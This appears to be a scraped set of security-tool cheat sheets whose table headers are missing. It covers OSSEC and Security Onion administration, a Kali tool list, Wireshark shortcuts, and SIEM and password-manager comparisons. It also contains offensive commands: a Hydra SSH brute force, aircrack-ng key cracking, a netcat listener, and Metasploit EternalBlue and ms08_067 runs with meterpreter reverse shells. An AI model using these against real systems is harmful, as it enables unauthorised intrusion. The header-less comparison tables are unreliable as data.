<include>rules/local_rules.xml</include>
</rules>
<active-response>
<command>firewalldrop</command>
<location>local</location>
<level>10</level>
</active-response>
<syscheck>
<frequency>3600</frequency>
<directories check_all="yes">/etc,/usr/bin</directories>
</syscheck>
</ossec_config>
<rule id="100001" level="10">
<decoded_as>sshd</decoded_as>
<description>Multiple failed SSH login attempts</description>
<group>authentication_failures,</group>
<frequency>5</frequency>
<timeframe>60</timeframe>
<same_source_ip />
</rule>
<decoder name="custom-ssh">
<program_name>sshd</program_name>
<regex>Failed password for (\w+) from (\d+\.\d+\.\d+\.\d+)</regex>
<order>user, srcip</order>
</decoder>
<active-response>
<command>firewalldrop</command>
<location>local</location>
<level>10</level>
<timeout>600</timeout>
</active-response>
sudo /var/ossec/bin/ossec-control start
Start OSSEC
sudo /var/ossec/bin/ossec-control stop
Stop OSSEC
sudo /var/ossec/bin/ossec-control restart
Restart OSSEC
sudo /var/ossec/bin/manage_agents
Manage agent keys (add/remove/list)
sudo /var/ossec/bin/agent_control -l
List connected agents
sudo /var/ossec/bin/ossec-logtest
Test log messages against rules/decoders
/var/ossec/etc/ossec.conf
Main configuration file
/var/ossec/etc/rules/
Rule files
/var/ossec/etc/decoders/
Decoder files
/var/ossec/logs/
Log files
/var/ossec/active-response/
Active response scripts
0
Ignore
1-3
Low (informational)
4-7
Medium (suspicious)
8-15
High (attack/critical)
Suricata
Network IDS/IPS, signature-based detection
Zeek (Bro)
Network analysis, protocol/file analysis
OSSEC
Host-based IDS (HIDS)
netsniff-ng
Full packet capture
Logstash
Log parsing and processing
Elasticsearch
Log indexing and search
Kibana
Dashboards and visualization
Sguil/Squert
Alert review and investigation
Playbooks
Guided alert triage and response
Redis
Log queuing
Check service status
sudo so-status
Start/stop services
sudo so-* start/stop
Update Security Onion
sudo soup
View logs
sudo tail -f /var/log/syslog
Packet capture (CLI)
sudo tcpdump -i <interface>
Check Elasticsearch status
curl -XGET 'localhost:9200/_cluster/health?pretty'
Access Kibana dashboard
https://<SO-IP>:5601
Access Sguil
sguil-client
Access Squert
https://<SO-IP>/squert
Restart node
sudo reboot
Kibana
https://<SO-IP>:5601
Squert
https://<SO-IP>/squert
Security Onion Console
https://<SO-IP>
Suricata
/nsm/sensor_data/<hostname>/suricata.log
Zeek
/nsm/sensor_data/<hostname>/zeek/
OSSEC
/var/ossec/logs/
Logstash
/var/log/logstash/
Elasticsearch
/var/log/elasticsearch/
sudo ufw enable
sudo ufw default deny incoming
sudo ufw allow <port/service>
sudo systemctl disable <service>
sudo apt install unattended-upgrades
Network Scanning
Nmap, Wireshark
Web App Testing
ZAP, Burp Suite
Exploitation
Metasploit, BeEF
Password Cracking
John the Ripper, Hydra
Wireless Attacks
Aircrack-ng, Reaver
Forensics
Autopsy, Volatility
Reverse Engineering
Ghidra, Radare2
Social Engineering
Social-Engineer Toolkit (SET)
Vulnerability Analysis
OpenVAS, Nessus
Sniffing/Spoofing
Ettercap, Bettercap
Maintaining Access
Weevely, Netcat
Reporting
Dradis
nmap 192.168.1.1 # Basic scan
nmap -O 192.168.1.1 # OS detection
nmap -sV <target> # Service/version detection
nmap -A <target> # Aggressive scan
nmap <target> --top-ports 10 # Top 10 ports
msfconsole # Start Metasploit
use exploit/windows/smb/ms17_010_eternalblue
wireshark # Launch GUI
# Use filters like 'http' in the display filter bar
airodump-ng wlan0 # Capture packets
aircrack-ng capture_file.cap # Crack WEP/WPA keys
hydra -l user -P passlist.txt ssh://192.168.1.1
john hash.txt
john --wordlist=passwords.txt hash.txt
burpsuite # Start Burp Suite
# Use Proxy tab to intercept traffic
nc -v 192.168.1.1 80 # Connect to TCP port
nc -lvp 4444 # Listen for connections
Update System
sudo apt update && sudo apt upgrade
Start Firewall
sudo ufw enable
List Running Services
systemctl list-units --type=service
Change User Password
passwd
Add New User
sudo adduser <username>
SSH Key Generation
ssh-keygen -t rsa -b 4096
Install New Tool
sudo apt install <toolname>
Search for Tool
apt-cache search <keyword>
Check Disk Usage
df -h
Monitor Processes
htop
Start Capture
Ctrl+E
Cmd+E
Stop Capture
Ctrl+E
Cmd+E
Open File
Ctrl+O
Cmd+O
Save Capture
Ctrl+S
Cmd+S
Find Packet
Ctrl+F
Cmd+F
Go to Packet
Ctrl+G
Cmd+G
Next Packet
↓
↓
Previous Packet
↑
↑
Expand All
*
*
Collapse All
-
-
Apply Display Filter
Ctrl+L
Cmd+L
Clear Display Filter
Ctrl+Shift+L
Cmd+Shift+L
Mark Packet
Ctrl+M
Cmd+M
Unmark All Packets
Ctrl+Shift+M
Cmd+Shift+M
Colorize Conversation
Ctrl+H
Cmd+H
sudo apt update
sudo apt install metasploit-framework
help
List all available commands
search
Search for modules (e.g., search smb
)
use
Select a module (e.g., use exploit/windows/smb/ms08_067_netapi
)
info
Show detailed info about the selected module
show options
List configurable options for the current module
set
Set a module option (e.g., set RHOST 192.168.1.10
)
run
/exploit
Execute the selected module
sessions
List and interact with active sessions
jobs
List background jobs
kill
Terminate a job by ID
exit
Exit msfconsole
back
Return to the main prompt from a module
banner
Display a random Metasploit banner
connect
Netcat-like connection to a host/port (e.g., connect 192.168.1.1 23
)
grep
Filter output (e.g., grep http search oracle
)
check
Test if the target is vulnerable before exploiting
edit
Edit the current module in a text editor
msf > search ms08_067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.10
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.100
msf exploit(ms08_067_netapi) > exploit
msfconsole
Start Metasploit console
search <keyword>
Search for modules
use <module_path>
Select a module
show options
Show module options
set <option> <value>
Set a module option
exploit
or run
Execute the module
sessions -l
List active sessions
sessions -i <id>
Interact with a session
background
Background the current session
jobs
List background jobs
kill <job_id>
Kill a background job
exit
Exit msfconsole
db_nmap <target>
Run Nmap scan and import results
info <module>
Show detailed info about a module
check
Test if target is vulnerable
banner
Display a random banner
connect <host> <port>
Netcat-like connection
grep <pattern> <command>
Filter output
msf > search smb
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options
msf exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.20
msf exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set LHOST 192.168.1.100
msf exploit(ms17_010_eternalblue) > exploit
msf > sessions -l
msf > sessions -i 1
Wazuh
Endpoint & log SIEM
Comprehensive, scalable, Elastic
Needs tuning, learning curve
Most organizations
Security Onion
Network & host SIEM
All-in-one, easy deployment
Resource-intensive, complex at scale
Network-centric environments
OSSEC
Host IDS
Lightweight, reliable
Limited SIEM features
Endpoint monitoring
OSSIM
Unified SIEM
Feature-rich, free
Fewer features than USM, complex
Small/medium orgs
ELK Stack
Log mgmt & visualization
Flexible, powerful dashboards
Not SIEM by default, setup needed
Custom SIEM builds
Prelude OSS
Modular SIEM
Integrates with IDS, modular
Limited scale/features
Small orgs, evaluation
MozDef
Cloud-native SIEM
Scalable, automation
Technical setup, small community
DevOps/cloud teams
Sagan
Log correlation
Fast, scriptable
Narrow focus, manual rules
IDS-heavy environments
Bitwarden
Yes
Yes
Yes
Yes
Yes
Yes
Yes
Yes
Some advanced 2FA paid
KeePass
Yes
Manual/3rd-party
Yes
Yes
3rd-party
Yes
Yes
Manual
No built-in sync/cloud
LastPass Free
Yes
One device type
Yes
No
Yes
Yes
Yes
Yes
Only one device type at a time
Zoho Vault
Yes
Yes
Yes
No
Yes
Yes
Yes
Yes
Some team features paid
Dashlane Free
Yes
One device only
Yes
No
Yes
Yes
Yes
Yes
One device only
NordPass Free
Yes
One device at time
Yes
No
Yes
Yes
Yes
Yes
One device at a time
RoboForm Free
Yes
No
Yes
No
Yes
Yes
Yes
Yes
No multi-device sync
Proton Pass
Yes
Yes
Yes
Yes
Yes
Yes
Yes
Yes
Some features may be paid later
LogMeOnce
Yes
Yes
Yes
No
Yes
Yes
Yes
Yes
Some features paid